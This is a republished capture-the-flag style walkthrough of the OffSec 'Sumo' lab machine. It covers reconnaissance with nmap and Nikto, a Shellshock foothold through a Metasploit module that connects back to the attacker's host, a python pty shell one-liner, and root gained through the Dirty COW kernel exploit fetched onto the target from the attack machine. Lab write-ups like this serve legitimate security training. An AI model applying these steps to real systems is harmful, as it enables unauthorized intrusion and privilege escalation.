Hacking, Copy on Write Exploit, Cybersecurity
OffSec — Sumo Walkthrough
A walkthrough with my tactics, techniques, and procedures.
Reconnaissance/Scanning:
Let’s start things off with a network scan to see which ports are open and the services running on each.
$ nmap -A -O -sC -sV -p- <machine_IP>
Scanning for directories with Gobuster:
I couldn’t find any other directories with gobuster, no other hosts/subdomains, and I didn’t find any other ports open after scanning again.
I decided to use the tool Nikto to see if that could find anything.
$ nikto -h <machine_IP>
Very interesting, that scan found a potential attack vector using the shellshock exploit.
Initial foothold:
This time I’ll use Metasploit framework and try to get my foothold with that.
The module of choice is:
exploit(multi/http/apache_mod_cgi_bash_env_exec)
There are a few of the options to change when that module is selected.
RHOSTS – <machine_IP>
TARGETURI – hxxp://<machine_IP>/cgi-bin/test
LHOST - <attack_IP>
LPORT - <PORT_of_choice>
NOTE: make sure to not have a listener on the attack machine using the same port from LPORT. Also, don’t pick the same port as the SRVPORT option.
Got initial access!
I’ll be taking that flag now.
In order to get a standard shell and be able to navigate better/use more commands, I’ll run the shell command within meterpreter:
# initiates a standard shell
$ shell
# check which python is running, that way I can get a stable shell
$ which python
# one liner to make the shell stable
$ python -c 'import pty; pty.spawn("/bin/bash")'
Exploit:
I checked a few ways to escalate privileges such as: cronjobs, binaries/executables with the SUID bits, hidden folders, SSH directory, and lastly, I checked the version of Linux running on the machine.
I checked with searchsploit for exploits on that kernel version.
The results show that the machine is potentially vulnerable to CVE-2016–5195 which is the “dirty cow” kernel exploit. Info found here.
"A race condition was found in the way the Linux kernel's memory subsystem
handled the copy-on-write (COW) breakage of private read-only memory mappings.
An unprivileged local user could use this flaw to gain write access to
otherwise read-only memory mappings and thus increase their privileges on the
system."
Here’s a snippet via exploit-db[.]com from the code on how to be able to run it.
I had to download the script to my machine, use Python to make another simple server, then grab it on the target machine and follow the directions to execute it.
NOTE: Whenever I am downloading anything to a machine that I’ve compromised, I’ll be in a directory that the compromised user can write to. (usually /tmp or /opt)
Privilege Escalation:
The new user with root privileges is made via the script and now I can escalate to that user.
Time to get that root flag!
Reporting:
- Keep all software and hardware patched and up to date with the latest security releases to prevent vulnerabilities.
Note from Publication: This story was uploaded at the permission of user “xocybersec” on 2/1/24. Please direct any feedback, comments, or citations to the original writer! Thank you — Infosec WatchTower
© [2024] Infosec WatchTower. All rights reserved. Unauthorized use or reproduction of content is prohibited. For inquiries, contact Infosec WatchTower.